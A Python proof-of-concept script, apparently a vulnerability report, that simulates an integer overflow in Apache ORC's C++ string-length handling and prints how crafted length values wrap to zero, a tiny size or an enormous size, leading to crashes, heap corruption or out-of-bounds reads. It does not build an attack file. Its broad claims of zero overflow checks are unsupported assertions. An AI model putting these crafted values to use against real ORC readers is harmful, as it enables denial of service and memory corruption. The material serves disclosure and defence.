File size: 2,761 Bytes
ecf1516
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python3
"""
PoC: Apache ORC String Length Integer Overflow
===============================================

Root cause: ColumnReader.cc:697
  totalLength += static_cast<size_t>(lengths[i]);
  // lengths[i] is int64_t from unsigned RLE decoder — NO negative check

String lengths decoded by unsigned RLE (isSigned=false, line 645)
are stored as int64_t. Values >= 2^63 become negative. static_cast<size_t>
on negative int64_t produces huge size_t → OOM or wrap-to-zero.
"""
import struct

def show_overflow():
    """Print a walkthrough of the string-length overflow arithmetic.

    Writes three sections to stdout: a fixed explanation of the code
    path under discussion, a simulation of three hard-coded length
    sequences, and a closing note. For each sequence the lengths are
    reinterpreted as signed 64-bit values and accumulated modulo 2**64,
    and a consequence is reported based on the resulting total.

    Takes no arguments and returns None.
    """
    u64_modulus = 2**64

    preamble = (
        "ORC StringDirectColumnReader::computeSize() Integer Overflow",
        "=" * 60,
        "",
        "Vulnerable code (ColumnReader.cc:691-706):",
        "  size_t totalLength = 0;",
        "  for (i = 0; i < numValues; ++i)",
        "    totalLength += static_cast<size_t>(lengths[i]);  // NO CHECK!",
        "",
        "How negative lengths occur:",
        "  1. RLE decoder is unsigned (isSigned=false, line 645)",
        "  2. Output stored in int64_t* (line 715-718)",
        "  3. uint64 values >= 2^63 become negative int64_t",
        "  4. static_cast<size_t>(negative) = huge positive",
        "",
    )
    print("\n".join(preamble))

    scenarios = [
        ("OOM DoS: single huge length", [2**63]),
        ("Wrap to 0: two lengths", [2**64 - 1, 1]),
        ("Wrap to 1: crafted pair", [2**64 - 100, 101]),
    ]

    for label, raw_lengths in scenarios:
        print(f"Case: {label}")

        running_sum = 0
        for raw in raw_lengths:
            wrapped = raw % u64_modulus
            # Reinterpret the same 64 bits as a signed integer.
            (signed_view,) = struct.unpack('q', struct.pack('Q', wrapped))
            running_sum = (running_sum + wrapped) % u64_modulus
            print(f"  RLE uint64={raw:#018x} -> int64={signed_view} -> size_t={wrapped:#018x}")

        print(f"  totalLength = {running_sum} ({running_sum:#018x})")

        # Pick the consequence lines for this total; totals between 1000
        # and 2**40 inclusive produce none.
        consequences = []
        if running_sum == 0:
            consequences.append("  -> blob.resize(0) -> EMPTY BLOB")
            consequences.append("  -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read")
        elif running_sum < 1000:
            consequences.append(f"  -> blob.resize({running_sum}) -> UNDERSIZED BUFFER")
            consequences.append("  -> actual data > blob size -> HEAP CORRUPTION")
        elif running_sum > 2**40:
            consequences.append(f"  -> blob.resize({running_sum}) -> ALLOCATION FAILURE -> OOM CRASH")

        for line in consequences:
            print(line)
        print()

    closing = (
        "Additional: Stripe offset overflow (Reader.cc:591)",
        "  stripeFooterStart = offset + index_length + data_length",
        "  All uint64 from protobuf, no overflow check",
        "  -> wraps around -> reads wrong file location",
        "",
        "ORC C++ has ZERO safe arithmetic in core parsing code",
        "  Reader.cc: 0 overflow checks in 1830 lines",
        "  ColumnReader.cc: 0 overflow checks in 1793 lines",
    )
    print("\n".join(closing))

# Run the demonstration only when this file is executed as a script,
# so importing the module does not print anything.
if __name__ == "__main__":
    show_overflow()